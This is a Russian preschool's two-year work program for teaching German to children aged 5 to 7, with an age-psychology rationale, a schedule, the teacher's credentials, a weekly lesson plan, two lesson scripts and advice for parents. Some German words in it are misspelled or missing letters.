Рабочая программа немецкий язык для дошкольников
рабочая программа

Марьям Фатиховна

Рабочая программа немецкий язык для дошкольников

Скачать:

ВложениеРазмер
Файл rabochaya_programma_nemetskiy_yazyk.docx81.88 КБ

Предварительный просмотр:

Российская Федерация

Ханты-Мансийский автономный округ - Югра

Муниципальное автономное дошкольное образовательное учреждение

«Детский сад  №2 «Рябинка»

Индекс  628684, Ханты-Мансийский

автономный округ – Югра, город Мегион,

улица Заречная, дом 19/4

Тел. 8(34643)3-01-32

ИНН  8605014733

КПП   860501001

р/с 40701810400003000006

ОГРН 1028601357113

E – mail: dou_ryabinka@mail.ru 

ПРИНЯТО                                                                УТВЕРЖДАЮ

на совещании                                                            заведующий МАДОУ «ДС№2 «Рябинка»

педагогических работников                                    __________________ Е.А. Никитина                                                                              

МАДОУ «ДС №2 «Рябинка»                                  приказ от 27.10.2020 №385-о                                        протокол от 06.10.2020 №6                                                                


РАБОЧАЯ ПРОГРАММА ПО РЕАЛИЗАЦИИ ДОПОЛНИТЕЛЬНОЙ                    ОБЩЕОБРАЗОВАТЕЛЬНОЙ ПРОГРАММЫ                                                                              ПОЗНАВАТЕЛЬНО - РЕЧЕВОЙ НАПРАВЛЕННОСТИ ПО НЕМЕЦКОМУ ЯЗЫКУ

« ГОВОРИМ И ПОЁМ НА НЕМЕЦКОМ»

ПО ОБУЧЕНИЮ ДЕТЕЙ 5-7 ЛЕТ

                                        

                                                                           Срок реализации программы: 2 года

                                                   

                                                                                       Автор: Силифонова М.Ф

город  Мегион, 2020

Оглавление

Содержание

Страница

1.

Возрастные психофизические особенности воспитанников. Старший дошкольный возраст (от 5 до 7  лет)

2.

Список детей

3.

График занятий

4.

Сведения о кадрах

5.

Календарно-тематическое планирование

6.

Кадровые условия

  1. Возрастные психофизические особенности  воспитанников

Старший дошкольный возраст

(от 5 до 7лет)

         За последние 5-6 лет число людей, изучающих иностранный  язык, резко возросло. То, что без знания иностранных языков современному человеку обойтись невозможно, стало очевидным почти для всех. Изменился и возраст обучающихся. Если до сих пор методика ориентировалась прежде всего на школьников, то теперь родители стремятся как можно раньше начать обучение детей иностранному языку. Тем более, что дошкольный возраст признан психологами наиболее благоприятным периодом для этого вида деятельности.

        Изменившаяся ситуация рождает все возрастающую потребность общества в квалифицированных преподавателях. Отсутствие их приводит к довольно печальным последствиям. Люди, едва владеющие основами языка, считают себя способными учить дошкольников, поскольку маленьким детям этих знаний, якобы, вполне достаточно. В результате не просто бесполезно тратится время, но и наносится ущерб дальнейшему продвижению детей в этой области: ведь переучивать всегда тяжелее, чем учить, и исправить дурное произношение труднее, чем поставить звуки с «нуля». Но даже когда к малышам приходят люди, прекрасно знающие язык, им не всегда удается добиться желаемого результата: обучение малышей – это очень непростое дело, которое требует совсем иного методического подхода, чем обучение школьников и взрослых. Столкнувшись с методически беспомощными уроками, дети могут надолго приобрести отвращение к иностранному языку, разувериться в своих возможностях.

        Дети дошкольного возраста воспринимают иностранный язык как новое открытие. Они только начинают познавать окружающий мир, и грамотное – психологически, педагогически – знакомство с иностранным языком позволит достичь удивительных результатов: иностранный язык станет почти родным для малыша, органично войдя в его систему знаний о мире. Сейчас ведется много разговоров о раннем обучении иностранным языкам, обсуждается, хорошо это или плохо. Иностранный язык и дети – это замечательно!

        Большинство исследователей сходится во мнении, что специальные занятия иностранным языком можно проводить с детьми 3-10 лет, до 3 – бессмысленно, после 10 – бесполезно надеяться на положительный результат, который возможен лишь для незначительной части учеников, тех, кто обладает коммуникативными и лингвистическими особенностями выше среднего уровня. Лучше всего изучать иностранный язык в 5-7 лет, когда система родного языка ребенком уже достаточно хорошо усвоена, а к новому языку он относится сознательно. Именно в этом возрасте еще мало штампов речевого поведения, легко по-новому «кодировать» свои мысли, нет больших трудностей при вступлении в контакт на иностранном языке. Если методическая система построена достаточно грамотно с лингводидактической и психолингвистической точки зрения, то успех в овладении предлагаемым ограниченным языковым материалом и создание необходимых предпосылок для дальнейшего усвоения любого иностранного языка обеспечен практически всем детям.

        Дети 5-7 лет отличаются особой чуткостью к языковым явлениям, у них появляется интерес к осмыслению своего речевого опыта, «секретов языка». В этом возрасте происходит постепенная смена ведущей деятельности, переход от игровой деятельности к учебной.

        Мнемическая деятельность детей данного возраста ещё несовершенна. У них преобладает непроизвольное запоминание: хорошо и быстро запоминается то, что интересно и вызывает эмоциональный отклик. Старшие дошкольники проявляют интерес к разным способам выражения мысли, к языку как способу общения, к специфичным для данного языка словам, к письменности. В языке дети интересуются семантикой (смысловой стороной речи), значениями слов, могут давать их толкование.

        Уникальная предрасположенность к речи (зоной наибольшего благоприятствования в овладении иностранным языком является возрастной период от 5 до 7 лет), пластичность природного механизма усвоения речи, а также определенная независимость этого механизма от действия наследственных факторов, связанных по принадлежности к той или иной национальности, – все это дает ребенку возможность при соответствующих условиях успешно овладеть иностранным языком. С возрастом эта способность постепенно угасает. Поэтому всякие попытки обучить второму иностранному языку (особенно в отрыве от языковой среды) детей более старшего возраста сопряжены, как правило, с целым рядом трудностей.

        Что же касается коммуникабельности и наличия положительной установки, то дети пяти-шести лет в большинстве своем достаточно коммуникабельны и лишены тех многочисленных комплексов и зажимов, которые становятся психологическим барьером для многих взрослых в овладении иностранным языком как средством общения (например, взрослый гораздо больше боится сделать ошибку); они любознательны, и стремятся к активному познанию мира; причем именно в этом возрасте процесс непосредственного чувственного познания дополняется словесным.

        Обучение детей старшего дошкольного возраста (5-7 лет) имеет свои особенности. Начиная работу с детьми, педагогу очень важно знать, что уровень развития детей еще недостаточен для самостоятельного решения ими многих задач, возникающих в процессе их деятельности (игровой, продуктивной, речевой и др.). Самостоятельность формируется у ребенка постепенно под руководством взрослого. Шестой год жизни является важным на пути подготовки ребенка к школе. В это время в педагогической литературе рекомендуется применять при обучении детей приемы, обеспечивающие повышение работоспособности детей, развитие умственной активности и любознательности, формирование элементов целенаправленного внимания, произвольной памяти и воображения, начальных форм осознанного управления своим поведением.

        Дети пяти-семи  лет обладают хорошим речевым слухом и цепкой языковой памятью. У них также сильно развито эмоционально-образное восприятие языка. Форма слова, его звуковая оболочка, складность и ритмичность речи, красота и выразительность звука для детей этого возраста важнее лексического значения и грамматической стройности. Слова привлекают их, прежде всего, своим звучанием. Дети пяти-шести лет особенно чувствительны к фоносемантическим закономерностям.

        Успешное овладение детьми иноязычной речью становится возможным еще и потому, что детей (особенно дошкольного возраста) отличают более гибкое и быстрое, чем на последующих возрастных этапах, запоминание языкового материала; наличие глобально действующей модели и естественность мотивов общения; отсутствие так называемого языкового барьера, т.е. страха торможения, мешающего вступить в общение на иностранном языке даже при наличии необходимых навыков; сравнительно небольшой опыт в речевом общении на родном языке и др. Кроме того, игра, являясь главным видом деятельности дошкольника, позволяет сделать коммуникативно ценными практически любые языковые единицы.

        Все это дает возможность в раннем возрасте оптимально сочетать коммуникативные потребности и возможности их выражения на иностранном языке детьми данного возраста и тем самым избежать одного существенного противоречия, которое постоянно возникает при более позднем начале обучения этому предмету между коммуникативными потребностями обучаемого (желание узнать и сказать много) и ограниченным языковым и речевым опытом (незнание, как это можно выразить малым количеством лексики).

        Важными неспецифическими свойствами личности, которые необходимы для успешного овладения иностранным языком, являются наличие положительной установки, интерес к жизни и культуре разных стран, как проявление вообще активного интереса к миру, а также коммуникабельность личности, то есть желание и умение вступать в общение с другими людьми и способность легко адаптироваться к различным ситуациям общения.

        Очень важно также отметить тот факт, что дети до 5 лет усваивают новую информацию в процессе взаимодействия с другими, в особенности, со взрослыми. Отсюда следует, что самостоятельное обучение ребенка (просмотр познавательных программ по телевидению, прослушивание кассеты с произношением иностранных слов либо просмотр диска с программой самообучения иностранному языку на компьютере) менее эффективны, чем изучение иностранного через реальное общение либо игру вместе со взрослыми. Никакие компьютерные программы по самостоятельному изучению иностранного языка без помощи со стороны родителей, которые могут поделиться своим практическим опытом, помочь правильно закрепить произношение слов, запомнить их значение (путем повторения), не принесут значительных результатов.

        С самого начала обучения необходимо выработать определенный стиль или традицию общения с детьми на иностранном языке, ввести и соблюдать некоторые ритуалы: приветствие, прощание, короткая зарядка, использование принятых в иностранном языке форм этикета. Такие «ритуалы» позволяют легко настроить детей на иноязычное общение, облегчают им переход на иностранные реплики, дисциплинируют малышей, показывая, что занятие началось и надо быть внимательным, что сейчас будет физкультминутка и можно подвигаться, что занятие закончилось и надо убрать за собой игрушки, стулья и т.п. Во время занятий лучше сажать детей  на стульчиках вокруг себя или за столом (часто это воспринимается,  как игра «В школу»).

        Игра – не просто любимое занятие детей, это ведущий вид деятельности дошкольников. С помощью игры легче осуществляется  включение в учебную деятельность. Игра требует от ребенка произвольного внимания, произвольного запоминания, эмоциональной сдержанности. Ведь каждая игра имеет правила, и по законам игр ребенок должен быть внимательным, соблюдать эти правила, быть корректным, подчинять свою волю игровым задачам. Дети с увлечением играют  в маленькие ролевые игры. При распределении ролей  детям предоставляется  свобода  выбора. Если несколько малышей претендуют  на одну роль, то английская считалочка помогает  разрешить спор. Ролевые игры помогают  адаптироваться к коллективу, к жизни взрослых.

        Для того чтобы успешно преодолеть трудности, необходимо тщательно продумывать средства наглядности и использовать эти средства на занятиях, благодаря чему удается организовать внимание детей. Для организации внимания детей используется также частая смена действий. Учитывая особенности памяти малышей, необходимо разучивать стихи, песни, считалки, рифмовки, загадки, делая это в непринужденной обстановке, позволяющей детям ходить, прыгать, играть и т.д.

        Необходимо сделать вывод, что способности к языку, как и всякие другие, развиваются только в соответствующей деятельности и потому  «любой нормальный ребенок может и должен овладеть иностранным языком и свободно пользоваться им в общении» (Леонтьев А.А.), но произойдет это или нет – во многом зависит от организации его деятельности педагогом, от методического подхода к обучению.

  1. Список детей

Ф.И.О. ребенка

Дата рождения

Дата приёма

1

2.11.2020

2

2.11.2020

3

2.11.2020

4

2.11.2020

5

2.11.2020

6

2.11.2020

  1. Расписание занятий образовательной деятельности

в рамках дополнительного образования

Наименование программы

Группа

Ф.И.О. руководителя

Должность

Дни недели/Время проведения занятий

ПН

ВТ

СР

ЧТ

ПТ

1.

Дополнительная общеразвивающая программа познавательно – речевой  направленности по немецкому языку для  детей от 5 до 7 лет «Говорим и поем на немецком»

.

15.10-15.35 чётн

15.10-15.35 не чёт.

  1. Кадровое обеспечение по реализации программы дополнительного образования «Радуга творчества»

Фамилия, имя, отчество

Силифонова Марьям Фатиховна

Дата рождения

04.07.1985

Должность

воспитатель

Образование

Средне -специальное

2005 г.  Диплом  Омская область ГОУ СПО Исилькульский педагогический  колледж

Специальность учитель немецкого языка

Квалификация иностранный язык

2016 Диплом о профессиональной переподготовке «АНОДО «СИБИНДО» по программе «Воспитатель дошкольного образования».

Курсы повышения квалификации

-

Работа в данном учреждении

с 2016года

Общий стаж работы

13 лет

Педагогический стаж

7 лет

Стаж работы на данной должности  

4 года

5.Календарно – тематическое планирование

Первый год обучения от 5 до 6 лет

Месяц

Недели

Программное содержание с учетом образовательных областей

Оборудование

Словарная работа

Предварительная работа

Литература

Октябрь

1 неделя

Guten Tag! «Tschüs».Здравствуйте! До свидание!

Мяч, алфавит.прописи.

Приветствие «Hallo». Прощание «Tschüs».

Вводное занятие. Введение в иноязычную среду. Страноведческий материал. Игра с мячом. Рифмовка.

Бим И.Л. Немецкий язык сборник упражнений, пособие для учащихся, -М.2010. стр.5

2 неделя

Guten Tag! «Tschüs».Здравствуйте! До свидание!

Мяч, алфавит, прописи.

 Стих – песня «Hallo? Wie geht?…»

Повторение и Закрепление материала изучаемого на предыдущем занятии. Игра с мячом. Рифмовка. Элементы интенсивного обучения.

Бим И.Л. Немецкий язык сборник упражнений, пособие для учащихся, -М.2010. стр.7

3 неделя

Вежливые слова «Danke»,«Dankeschön», «Bitte» , « Bitteschön».Спасибо! Пожалуйста!

Мяч, настольный  театр.

«Danke»,«Dankeschön», «Bitte» , « Bitteschön». Спасибо! Пожалуйста!

Игра  с мячом.

Кукольные персонажи.

Иллюстрированный учебник для детей «Kennst du das?» стр.5-8

4 неделя

 Вежливые слова «Danke»,«Dankeschön», «Bitte» , « Bitteschön».Спасибо! Пожалуйста!

Мяч, настольный  театр.

«Danke»,«Dankeschön», «Bitte» , « Bitteschön». Спасибо! Пожалуйста!

Диалог «Знакомство»(здороваться и называть своё имя).

Иллюстрированный учебник для детей «Kennst du das?» стр.9

Ноябрь

2 неделя

1 неделя

«Wie heist du?» «Ich heisse …» «Ich mag…». Как тебя зовут? Глаголы( malen,springen,laufen) (рисовать, прыгать, бегать)

Сюжетные картинки, прописи.

malen,springen,laufen) (рисовать, прыгать, бегать)

вопрос и ответ на поставленный вопрос. Скороговорка «Eine lange Schlange..»

Иллюстрированный учебник для детей «Kennst du das?» стр.10

2 неделя

«Wie heist du?» «Ich heisse …» «Ich mag…». Как тебя зовут? Глаголы( malen,springen,laufen) (рисовать, прыгать, бегать).

Сюжетные картинки, прописи.

Гроздь винограда, налеп. malen,springen,laufen) (рисовать, прыгать, бегать)

Правильное произношение звуков

Иллюстрированный учебник для детей «Kennst du das?» стр.12

3 неделя

Домашние животные. Прилагательные (gross, klein, gut, schleht, schön)(большой, маленький, хороший, плохой)

Картинки животных.

(gross, klein, gut, schleht, schön)(большой, маленький, хороший, плохой).

Считалочка «1,2 – Polizei…».

Иллюстрированный учебник для детей «Kennst du das?» стр.15

4 неделя

Домашние животные. Прилагательные (gross, klein, gut, schleht, schön)(большой, маленький, хороший, плохой).

Картинки животных

(gross, klein, gut, schleht, schön)(большой, маленький, хороший, плохой).

диалог «Знакомство»(здороваться и называть своё имя, спрашивать: как дела?).

Иллюстрированный учебник для детей «Kennst du das?» стр.12

Декабрь

1 неделя

Использование структуры «Das ist ein\eine…» (Это…..)

Картинки, мягкая игрушка

«Das ist ein\eine…» (Это…..) Дикие животные.

игра  «Ballspiel»

2 неделя

Die Tiere.

Животные.

Картинки.

. der Papagei, der Krokodil,

der Tieger, der Kenguruh.  

РО: Ich bin Papagei.

Игра «Кто пропал?» Игра с мячом.

3 неделя

Die Tiere.

Животные.

Картинки.

. der Papagei, der Krokodil,

der Tieger, der Kenguruh.  

РО: Ich bin Papagei.

Игра «Кто пропал?» Игра с мячом.

4 неделя

Die Zimmer.Комната.

Предметные картинки, прописи.

Глаголы (sitzen,stehen,sehen

Стихотворение «Punkt, Punkt, Komma…»

Январь

1 неделя

Каникулы

2 неделя

Die Zimmer.Комната. Счёт до 8-ми.

Предметные картинки, мягкая игрушка, плакат с цифрами.

.

Игра с мячом.

 

3 неделя

Согласие и отрицание (nein, ja). (нет,да).( Ist das ein\eine…., Ja\Nein,das ist… )

Мягкая игрушка, разрезные карточки.

(nein, ja). (нет,да).

Игры с мячом «Волшебный мешочек», «Превращение».

4 неделя

Согласие и отрицание (nein, ja).(нет,да) ( Ist das ein\eine…., Ja\Nein,das ist… )

Картинки, прописи.

(nein, ja). (нет,да).

Игры с мячом «Волшебный мешочек», «Превращение».

Февраль

1 неделя

Die Familie. Семья.

Картинки членов семьи.

(Wer ist das?). Кто это?

Беседа, новая лексика.

2 неделя

Die Familie. Семья.

считалочки и стихи.

Wer ist das? Кто это?

. Игра с мячом.

3 неделя

Die Körperteile. Части тела.

Картинки, мягкая игрушка.

ЛЕ: der Kopf, die Haare, das Ohr, das Auge, der Mund, der Hals, die Zähne, der Arm, die Hand,der Finger,der Bauch, das Bein

Беседа по новой лексике

4 неделя

Die Körperteile. Части тела.

Картинки, мягкая игрушка.

ЛЕ: der Kopf, die Haare, das Ohr, das Auge, der Mund, der Hals, die Zähne, der Arm, die Hand,der Finger,der Bauch, das Bein

Беседа по новой лексике

Март

1 неделя

Игра «Zeig mir, bitte».Повторение лексики.

Прописи, разрезные карточки, цифры.

Беседа по изученной лексике.

2 неделя

Guten Appetit!

Приятного аппетита!

Картинки с продуктами

die Banane,die Apfelsine, die Mandarine, die Torte, dieSchokolade, die Limonade .

Беседа по новой лексике

\

3 неделя

Guten Appetit!

Приятного аппетита!

Рисунки. Лексические игры

die Suppe, das

Brot, die Wurst, die Käse,

die Kartoffel

Беседа по изученной лексике.

4 неделя

Die Welt der Farben.Мир красок.

Картинки цветов, прописи.

ЛЕ: rot, orange, gelb, grȕn, blau, schwarz, weiβ

Беседа о цветах

Апрель

1 неделя

Meine Lieblingsfarbe. Мой любимый цвет.

Мягкая игрушка, карточки с заданиями.

Игра: Welches ist meine Lieblingsfarbe

2 неделя

Die Wochentage. Дни недели.

Календарь, прописи, алфавит.

ЛЕ: die Wochentage

Игры: Tage-Memory.

3 неделя

Die Wochentage.Дни недели.

Календарь, цифры.

ЛЕ: die Wochentage

Игра: Was ist dein Lieblingswochentag?

Ballspiel.

4  неделя

Obst und Gemȕse. Овощи и фрукты.

Картинки овощи и фрукты.

ЛЕ: die Birne, die Orange, die Banane, die Tomate, der Gurken

Игра « Das Spiel: Was magst du? – Ich mag…

5 недель

Obst und Gemȕse.Овощи и фрукты.

Раздаточный материал

die Birne, die Orange, die Banane, die Tomate, der Gurken

Die Spiele: Obst und Gemȕsesalat, Rate, mal! Gib mir, bitte! Nimm, bitte!

Май

1 неделя

Spielzeuge.

Игрушки.

Рифмовка. Картинки.

der Ball, die Puppe,

der Clown, das Auto, der

Roboter, die Rakete.

Игры «Что пропало»,

«Угадай-ка!»

2 неделя

Spielzeuge.

Игрушки.

Рифмовка. Картинки.

der Ball, die Puppe,der Clown, das Auto, der

Roboter, die Rakete.

Игры «Что пропало»,

«Угадай-ка!»

3 неделя

Обобщающее занятие.

Разрезные карточки, прописи.

Диалог на базе изученной лексике

4 неделя

Обобщающее занятие по всему курсу.

Предметные картинки, мяч, прописию

Беседа по всему изученному курсу. Игры

Второй  год обучения от 6 до 7 лет

Месяц

Недели

Программное содержание с учетом образовательных областей

Оборудование

Словарная работа

Предварительная работа

Литература

Октябрь

1 неделя

Die Welt der Farben. Мир цвета.

Раздаточный материал.

ЛЕ: rot, orange, gelb, grȕn, blau, schwarz, weiβ.

Игры: Farben-Memory, Was hat welche Farbe?

2 неделя

Meine Lieblingsfarbe. Мой любимый цвет.

Разрезные карточки

 ЛЕ: rot, orange, gelb, grȕn, blau, schwarz, weiβ.

Игра: Welches ist meine Lieblingsfarbe?

3 неделя

Die Wochentage Дни недели.

Календарь, прописи.

die Wochentage

Игры: Tage-Memory

4 неделя

 Игры: Tage-Memory

Мягкая игрушка, разрезные карточки.

die Wochentage

Игра: Was ist dein Lieblingswochentag?

Ballspiel.

Ноябрь

2 неделя

1 неделя

Die Körperteile. Части тела.

Предметные картинки, игрушка, прописи.

der Kopf, die Haare, das Ohr, das Auge, der Mund, der Hals, die Zähne, der Arm, die Hand,der Finger,der Bauch, das Bein, der Fuβ

Беседа на новую тему.

2 неделя

Стихотворение «Punkt, Punkt, Komma…»

Прописи, картинки

der Kopf, die Haare, das Ohr, das Auge, der Mund, der Hals, die Zähne, der Arm, die Hand,der Finger,der Bauch, das Bein, der Fuβ

Стихотворение с рисованием частей тела.

3 неделя

Игра «Zeig mir, bitte».(Покажи мне….)

Карточки с заданиями.

Цвет,части тела, дни недели.

Беседа по изученной лексике.

4 неделя

Домашние животные. Прилагательные (gross, klein, gut, schleht, schön)(большой, маленький, хороший, плохой).

Предметные картинки,прописи.

(gross, klein, gut, schleht, schön)(большой, маленький, хороший, плохой).

диалог «Знакомство»(здороваться и называть своё имя, спрашивать: как дела?).

Декабрь

1 неделя

Домашние животные. Прилагательные (gross, klein, gut, schleht, schön)(большой, маленький, хороший, плохой).

Предметные картинки,прописи.

(gross, klein, gut, schleht, schön)(большой, маленький, хороший, плохой).

диалог «Знакомство»(здороваться и называть своё имя, спрашивать: как дела?).

2 неделя

Ich und meine Familie. Я и моя семья.

Семейные фото

die Mutter,

der Vater, derOpa, die

Oma; lustig, klug, alt, gut.

Составление коротких предложений.

3 неделя

Ich und meine Familie. Я и моя семья.

Прописи, кукла

die Mutter,

der Vater, derOpa, die

Oma; lustig, klug, alt, gut.

Составление коротких предложений.

4 неделя

Der Nikolaustag.Новый год.

Предметные картинки, новогодние атрибуты.

Новый год, елка, дед Мороз, Снегоурочка.

Беседа о традициях.

Январь

1 неделя

Каникулы

2 неделя

Der Nikolaustag. Новый год.

Песня. Стихи

Новый год, елка, дед Мороз, Снегоурочка.

Беседа о традициях.

3 неделя

Weihnachten. Рождество.

Иллюстрации.

Bonbons, Apfelsine, das Lego-Spiel, Domino, das Computerspiel; реплики: Danke, Bitte.

Песня  «O, Tannenbaum».

4 неделя

Weihnachten. (Повторение). Рождество.

Рождественские атрибуты, магнитофон

Bonbons, Apfelsine, das Lego-Spiel, Domino, das Computerspiel; реплики: Danke, Bitte.

Игры: Katze im Sack, magische Karten

Февраль

1 неделя

Woher kommst du?

Meine Stadt.Откуда ты? Мой город.

Фото города, достопримечательностей.

. Die Länder: Russland, Deutschland, Ӧstereich, Schweiz, China, Polen, Frankreich, England, Finnland.

Игра: Kommst du aus?

Meine Stadt ist..., Ich wohne in …

2 неделя

Woher kommst du? Откуда ты?

Фото города, достопримечательностей.

Die Länder: Russland, Deutschland, Ӧstereich, Schweiz, China, Polen, Frankreich, England, Finnland.

Игра: Kommst du aus?

Meine Stadt ist..., Ich wohne in …

3 неделя

Der Winter. Зима.

Картинки. Игры.

der Winter, der Schnee, die Flocke, fallen; weiβ.

Разучивание песенки “Es ist kalt».. 

4 неделя

Der Winter. Зима.

Картинки. Игры.

der Winter, der Schnee, die Flocke, fallen; weiβ.

Закрепление песенки

“Es ist kalt».

Март

1 неделя

Der Frȕhling.Весна.

Сюжетные картинки.

der Frȕhling, es taut, die Sonne scheint, es ist warm,die Vögel singen.

Разучивание стихотворения.

2 неделя

Der Frȕhling.Весна.

Сюжетные картинки.

der Frȕhling, es taut, die Sonne scheint, es ist warm,die Vögel singen.

Игра «Was fehlt?»

\

3 неделя

Mein Zimmer.Моя комната.

Предметные картинки, прописи.

предлоги: in, an, auf.

Игра «Wo liegt …?»

4 неделя

Der Einkauf. Покупка.

Сюжетные картинки, цифры

der Käufer, der Verkäufer, das Geschäft, was kostet…?

Беседа  по новой лексике. Das Spiel: Im Geschäft.

Апрель

1 неделя

Der Einkauf. Покупка.

Картинки, прописи.

der Käufer, der Verkäufer, das Geschäft, was kostet…?

Игра Was fehlt?

2 неделя

Obst und Gemȕse. Овощи и фрукты.

Картинки овощи и фрукты.

die Birne, die Orange, die Banane, die Tomate, der Gurken

Игра « Das Spiel: Was magst du? – Ich mag…

3 неделя

Obst und Gemȕse.Овощи и фрукты.

Раздаточный материал

die Birne, die Orange, die Banane, die Tomate, der Gurken

Die Spiele: Obst und Gemȕsesalat, Rate, mal! Gib mir, bitte! Nimm, bitte!

4  неделя

Spielzeuge.

Игрушки.

Рифмовка. Картинки.

der Ball, die Puppe,

der Clown, das Auto, der

Roboter, die Rakete.

Игры «Что пропало»,

«Угадай-ка!»

5 недель

Spielzeuge.

Игрушки.

Рифмовка. Картинки.

der Ball, die Puppe,der Clown, das Auto, der

Roboter, die Rakete.

Игры «Что пропало»,

«Угадай-ка!»

Май

1 неделя

 Das Märchen spielen. Tanzen und singen.Играем сказку. Танцуем и поем.

Магнитофон, музыкальные атрибуты.

Слова песни.

Играем в сказку. Разучиваем песню, поем и танцуем.

2 неделя

Das Märchen spielen. Tanzen und singen.Играем сказку. Танцуем и поем.

Атрибуты для сказки

Слова сказки

Играем в сказку. Разучиваем песню, поем и танцуем.

3 неделя

Обобщающее занятие.

.Картинки, цифры, алфавит, прописи.

Диалог на базе изученной лексике

4 неделя

Обобщающее занятие по всему курсу.

Картинки, цифры, алфавит, прописи.

Беседа по всему изученному курсу. Игры

ПРИЛОЖЕНИЕ

 «Getier»(Животные)

Цель: формирование лексического навыка и речевых образцов по теме «Животные» в игровой ситуации

Задачи:

1) образовательная - способствовать обучению умения называть животных на немецком языке;

2) развивающая - создать условия для развития памяти, внимания, воображения; умения слушать и слышать; для развития этикетной функции общения на немецком языке;

3) воспитательная - содействовать формированию навыка межличностного общения, воспитанию у детей интереса к изучению немецкого языка.

Оборудование: картинка Незнайки ,картинки  животных: лиса, волк, заяц, медведь

Ход занятияю

1 Вводная часть

В: Steht auf

Ich will euch begren

Ich mache das so: Hallo! Hallo!

Schn, dass ihr heute hier seid

Und nicht anderswo: Hallo! Hallo! Hallo!

В:А сейчас давайте познакомимся:

Ich bin ich

Du bist du

Ich heie Elena Petrovna

Und wie heit du?

(дети знакомятся друг с другом)

В: Молодцы, ребята, посмотрите, кто к нам пришёл в гости?

В: Верно, давайте с ним поздороваемся

В: Guten Tag, Nesneika!

Д: Guten Tag, Nesneika!

Незн: Guten Tag, Kinder!

В: Ребята, Незнайка, пришёл к нам не просто так, его пригласили поехать в лучший зоопарк в Берлине, но он не знает названия животных на немецком языке и просит нас помочь ему это узнать. Ребята, мы поможем незнайке?

В: Ребята, сейчас я буду называть животных, вы внимательно слушайте,вам нужно запомнить и повторить: das ist ein Hase, der Wolf, der Fuchs, der Br, die Giraffe.

В: Sprecht mir nach: das ist ein Hase, der Wolf, der Fuchs, der Br, die Giraffe. Gut.

В: Ребята, посмотрите, на доску и запомните карточки на которых изображены животные, как только вы их запомните, вам нужно закрыть глаза, а я уберу карточку одного животного, а вам нужно будет сказать, кого не хватает, только называть животное нужно на немецком языке.

Игровые действия

В: А сейчас мы с вами немного отдохнём: Steht auf. Sprecht mir nach:

1,2,3,4 – alle alle lessen wir,

1,2,3,4 – alle alle malen wir,

1,2,3,4 – alle alle tanzen wir,

1,2,3,4 – alle, alle boxen wir.

В: Молодцы, присаживайтесь, а сейчас мы с вами поиграем еще в одну игру которая называется «Снежный ком», я сейчас вам раздам карточки с изображением животных, а вам нужно будет назвать всех животных, которых назвали перед вами и назвать своё животное,я начну: das ist ein Hase

(дети по очереди называют животных которые были названы ранее, а затем называют своё животное)

В: Ребята, у вас на столах лежат карточки с изображением животных, давайте их назовём: Sprecht mir nach: der Hase, der Wolf, der Fuchs, der Br, die Giraffe. Gut. Ребята, сейчас я буду называть животное, а вы должны показать карточку с этим животным.

Игровые действия

В: Молодцы, все справились, а сейчас давайте, ещё раз повторим названия животных.

Sprecht mir nach: der Hase, der Wolf, der Fuchs, der Br, die Giraffe. Gut.

В: Ребята, Незнайка, теперь знает названия животных он говорит вам большое спасибо за помощь, и говорит нам Auf Wiedersehen!

Конспект занятия «Знакомство»

Цель: познакомить детей с немецкими фразами Hallo! Ich heie. Guten tag! Tschu!

Задачи:

Образовательные: формировать представления детей об иностранном языке.

Развивающие: развивать память, воображение, любознательность, общую и мелкую моторику.

Воспитательные: воспитывать интерес, доброжелательное отношение друг к друга.

Ход занятия

В: Ребята, сегодня к нам в группу пришел гость. Но для того что бы поприветствовать нашего гостя с хорошим настроением, давайте встанем в круг, возьмёмся за руки, повернёмся друг к другу, поприветствуем и улыбнёмся.                                                           Молодцы ребята, садитесь на свои места.

Ребята, сегодня к нам в гости пришёл Зайка (игрушка). Он пришёл к нам из другой страны. Ребята, а вы знаете в какой стране мы живём?

В.: Ребята, скажите мне, на каком языке мы с вами разговариваем? (Ответы детей).

В.: Правильно. А какие языки вам известны?                                                                                Молодцы, ребята.                                                                                                                                          Ребята к нам в гости пришел зайка. Давайте поздороваемся с ним. Здравствуй зайка.

Здравствуйте ребята.

В.: Зайка, а почему ты грустишь?

Мой друг, который живет в Германии, пригласил меня к себе в гости в Германию. Но я не знаю немецкого языка. Научите меня пожалуйста немецкому языку.

В.: Ребята, поможем зайке? (Ответы детей). Вместе с ним и мы научимся здороваться и прощаться на немецком языке.

Послушайте как здороваются люди в Германии: Guten Tag! Вы знаете как тикают часики? Давайте поиграем в часики. Вместе с нами будет повторять наш гость.                    Молодцы ребята.

Теперь давайте погреем наши ладошки "ha-ha-ha". Повторяйте за мной Hallo! Зайка давай теперь встанем в круг, возьмемся за руки и скажем друг другу Hallo!

Ребята, хотите научиться называть свое имя на немецком языке? (Ответы детей).

Послушайте Ich heie. (меня зовут.)

Зайка попробуй повторить.

Ребята, давайте по очереди назовем свои имена.

Молодцы!

Ребята вы наверное устали?

Зайка нам предлагает немножечко размяться.

Eins zwei drei vier alle alle turnen wir

Eins zwei drei vier alle alle fahren wir

Eins zwei drei vier alle alle fliegen wir

Молодцы ребята.

Нашему гостю пора уходить. В Германии люди прощаются так Tschu!

Давайте попрощаемся с нашим новым другом.

Консультация для родителей

О раннем обучении иностранным языкам

“Чем раньше мы начнём преподавать
                                                                                       иностранный язык детям, тем раньше
                                                                                       познакомим их с миром детей,
                                                                                       говорящих на других языках”

Р.Фройденштайн

        Языки полезно учить не только потому, что это помогает общению, но и потому, что это развивает мозг. Дети активно усваивают информацию, поэтому изучение иностранных языков можно и нужно начинать уже в детском саду.

        Дошкольный возраст особенно благоприятен для начала изучения иностранного языка: дети этого возраста отличаются особой чуткостью к языковым явлениям, у них появляется интерес к осмыслению своего речевого опыта, «секретов» языка. Они легко и прочно запоминают небольшой по объему языковой материал и хорошо его воспроизводят. С возрастом эти благоприятные факторы теряют свою силу.

         Есть еще одна причина, по которой ранний возраст предпочтителен для занятий иностранным языком. Чем моложе ребенок, тем меньше его словарный запас в родном языке. Но при этом меньше и его речевые потребности: сфер общения у маленького ребенка меньше, чем у старшего, ему еще не приходится решать сложные коммуникативные задачи. А значит, овладевая иностранным языком, он не ощущает такого огромного разрыва между возможностями в родном и иностранном языке, и чувство успеха у него будет более ярким, чем у детей старшего возраста.

        В дошкольном возрасте при обучении немецкому языку у детей происходит постепенное развитие основ коммуникативной компетенции, которая на ранней стадии изучения немецкого языка включает в себя следующие аспекты:

  • умение правильно с фонетической точки зрения повторить немецкие слова за преподавателем, носителем языка или диктором, то есть поэтапное формирование слухового внимания, фонетического слуха и правильного произношения;
  • овладение, закрепление и активизация немецкого словаря;
  • овладение определенным количеством несложных грамматических структур, построение связного высказывания.

